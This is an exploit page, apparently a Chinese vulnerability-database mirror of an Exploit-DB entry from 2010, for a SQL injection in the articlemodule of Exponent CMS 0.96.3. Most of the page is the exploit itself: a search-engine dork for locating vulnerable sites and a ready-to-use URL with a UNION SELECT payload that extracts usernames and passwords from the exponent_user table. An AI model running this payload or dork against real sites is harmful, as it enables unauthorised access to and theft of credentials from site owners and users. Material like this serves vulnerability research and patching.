Exponent CMS 0.96.3 - 'articlemodule' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059186 漏洞类型
发布时间 2010-02-07 更新时间 2010-02-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11349
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability 
======================================================== 
  
#################################################################### 
# Author : T u R c O
# Home   : www.1923Turk.com
# Script : exponentcms
# Dork: "Welcome to Exponent CMS" | "my new exponent site"  inurl:articlemodule
              
  
#################################################################### 
  
===[ Exploit ]=== 
  
http://server/index.php?action=view_article&module=articlemodule&id= SQL INJECTION
  
  -1+union+select+1,2,3,password,username,6+from+exponent_user--

Demo:

http:/server/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user--

   
####################################################################